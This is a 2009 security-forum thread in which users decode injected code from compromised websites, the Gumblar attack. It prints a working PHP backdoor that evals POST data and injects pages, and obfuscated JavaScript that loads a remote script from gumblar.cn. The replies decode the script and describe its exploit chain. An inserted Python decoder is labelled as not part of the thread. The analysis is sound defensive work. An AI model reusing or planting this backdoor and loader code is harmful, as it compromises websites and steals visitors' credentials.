Zero Identity Forums - General - Security - decode me



swiftnomad
Administrator
Public Relations

ZI Guru

Joined: 04.04.2008
Last Seen: 10 year(s) ago
Experience: 3274.18
Points: 405
#1 decode me on May 13 2009 15:39

function(qLx){var nASYW='%';var jkX=('var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22).3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26(docu.6de.6et.2eco.6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s).21.3dt.79p.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo.77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr.22+b.2b.61+.22Minor.22+b.2b.61.2b.22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src.3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d').replace(qLx,nASYW);eval(unescape(jkX))})(/./g);


Clients' websites have a lot of encrypted code and hidden iframes, and all of them are reported as attack sites. I'm trying to figure out what all this encrypted shit is.


<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('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'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("n",$v))>5){$e=preg_match('#['"][^s'".,;?![]:/<>()]{30,}#',$v)||preg_match('#[([](s*d+,){20,}#',$v);if((preg_match('#bevalb#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- ndocument.write(unescape(.+?n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(s*<body)#mi',TMP_XHGFJOKL.'1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


I figured out some of it. The base64 was easy.


<script language=javascript><!-- 
(function(qLx){var nASYW='%';var jkX=('var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22.2cu.3d.6ea.76.69ga.74o.72.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22).3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26(docu.6de.6et.2eco.6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s).21.3dt.79p.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo.77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr.22+b.2b.61+.22Minor.22+b.2b.61.2b.22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src.3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript.3e.22.29.3b.7d').replace(qLx,nASYW);eval(unescape(jkX))})(/./g);
 --></script>


But I don't get it.


if (sizeof (problems.txt) > CRITICAL){
    exec("> /dev/null"); }


USER: Hello Tech Support? I can't print...
ME: Try cursive then <hang up>
pyr0t3chnician
Member
Too Legit

Professional Analyst

Joined: 04.01.2009
Last Seen: 10 year(s) ago
Experience: 455.88
Points: 545
#2 Too Legit on May 14 2009 22:25
The first JavaScript stuff says this. The function takes in the variable qLx (which is a period), then it replaces the .'s with % signs in the huge string and creates the script in unescape. Hope that helps somewhat in your decoding.

var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//gumblar.cn/rss/?id="+j+"></script>");}

Unless I am reading this wrong, it makes j = "ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuild+"j;"
I have no idea what the code does besides checking user agent stuff and your cookies for miek=1.

EDIT: found this site, has lots of info on gumblar.cn: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

Sounds like this malicious little bugger moves you over to the gumblar.cn website, forces a PDF file download with an Adobe exploit, then searches for your FTP clients, grabs stored passwords, sends them home, then logs on to those ftp sites, and modifies your files.

tancurrom
Administrator
Nibble

Advanced Analyst

Joined: 03.04.2008
Last Seen: 10 year(s) ago
Experience: 501.5
Points: 450
#3 on May 15 2009 13:34
Yeah, you got that somewhat. The string jkX is already escaped and also has the % replaced by periods to obfuscate it more; it holds the script that runs.

The code that is then evaluated only runs if you are using Windows (not NT), the cookie miek isn't 1 and zrvzts isn't a string.

The second eval evaluates to this.
if(window.ScriptEngine) {
  j = ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();
}


I think it's basically fetching the local version number of the hack so it can be passed to their servers so they return the right exploit code to run, maybe log it as well.

Ultimately you end up executing this... (where 000 is the version number)
<script>zrvzts="A";</script>
<script src=//gumblar.cn/rss/?id=000></script>


Setting the cookie miek=1 will prevent the script running as a quick fix.

@pyr0t3chnician
That link made me chuckle. Facts 2.1 and 2.2 are consistent with most scripts I write, they're kind of invalid points.

A Nibble = 1/2 a Byte

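Putting the two decodes above into a runnable form, as an added example that is not part of the thread: it applies the '.' to '%' swap and unescape step, rebuilds the inner eval() string from the a and b variables, and pulls out the script source and the miek cookie check. It assumes the `/./g` on the page was `/\./g` before the forum stripped the backslash, which is how the posters read it.

```python
# Added example (not from the thread): undo the "." -> "%" swap, rebuild the
# second-stage eval() string, and extract the indicators the posters point to.
import re
from urllib.parse import unquote

# Obfuscated payload exactly as quoted in post #1 (split only for line length).
OBFUSCATED = (
    "var.20.61.3d.22.53.63r.69ptEngine.22.2cb.3d.22Version.28.29+.22.2cj.3d.22.22"
    ".2cu.3d.6ea.76.69ga.74o.72.2eus.65rAge.6et.3bi.66((u.2eindexOf(.22Win.22)"
    ".3e0).26.26(u.2e.69nd.65xO.66(.22NT.206.22).3c0.29.26.26(docu.6de.6et.2eco"
    ".6fkie.2e.69n.64e.78.4ff(.22miek.3d1.22).3c0).26.26.28typeo.66.28zrv.7a.74s)"
    ".21.3dt.79p.65o.66(.22A.22)).29.7bzrv.7ats.3d.22A.22.3b.65val.28.22i.66(windo"
    ".77.2e.22+a+.22)j.3dj+.22+a+.22Ma.6a.6fr.22+b.2b.61+.22Minor.22+b.2b.61.2b"
    ".22.42uild.22+b+.22j.3b.22.29.3bd.6fcument.2ewrite(.22.3cscri.70.74.20src"
    ".3d.2f.2f.67umblar.2e.63.6e.2fr.73s.2f.3f.69d.3d.22+j+.22.3e.3c.5c.2f.73cript"
    ".3e.22.29.3b.7d"
)

def decode_stage1(obf: str) -> str:
    # Assumption: the page's /./g lost a backslash and was /\./g, i.e. every
    # '.' becomes '%'; unquote() then does what JS unescape() does for %XX.
    return unquote(obf.replace(".", "%"))

def js_concat(expr: str, env: dict) -> str:
    # Evaluate a JS expression made only of "..." literals and variable names
    # joined by '+'; that is all the inner eval() argument contains.
    parts = []
    for lit, name in re.findall(r'"([^"]*)"|([A-Za-z_]\w*)', expr):
        parts.append(env[name] if name else lit)
    return "".join(parts)

def decode_stage2(script: str) -> str:
    # Rebuild the string the inner eval() receives from the a/b/j vars
    # declared at the top of the stage-1 script.
    env = dict(re.findall(r'(?:var |,)([a-z])="([^"]*)"', script))
    expr = re.search(r'eval\((.*?)\);', script).group(1)
    return js_concat(expr, env)

def indicators(script: str) -> dict:
    # What a defender blocks or sets: the injected script source and the
    # cookie whose presence makes the script bail out.
    src = re.search(r'<script src=([^"> ]+)', script)
    cookie = re.search(r'cookie\.indexOf\("([^"]*)"\)', script)
    return {"remote_src": src.group(1) if src else None,
            "killswitch_cookie": cookie.group(1) if cookie else None}

if __name__ == "__main__":
    stage1 = decode_stage1(OBFUSCATED)
    print(stage1, decode_stage2(stage1), indicators(stage1), sep="\n")
```

The stage-2 output shows the trailing `+j` that both decodes above left out; it changes nothing about what gets fetched.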
pyr0t3chnician
Member
Too Legit

Professional Analyst

Joined: 04.01.2009
Last Seen: 10 year(s) ago
Experience: 455.88
Points: 545
#4 on May 15 2009 21:45
So here's a question. It's all over the net that this malicious script is hosted by gumblar.cn, so why don't they get shut down?

My friend owns a hosting/reseller company, and when someone reports something as little as spam from one of his clients' servers, he shuts it down until they fix the problem. If someone is intentionally doing this, he straight up deletes their account.

Also on a side note, he was pretty pissed this past weekend. Someone hacked into one of his major servers through SSH and deleted 75 VPS accounts on the partitions, all in about 5 minutes. He had to tell those clients they lost their databases, their backups, and pretty much everything that was stored on their VPS, so they weren't too happy. I told him to quit pissing off hackers and accept their fraudulent credit cards when they try to purchase a dedicated server.
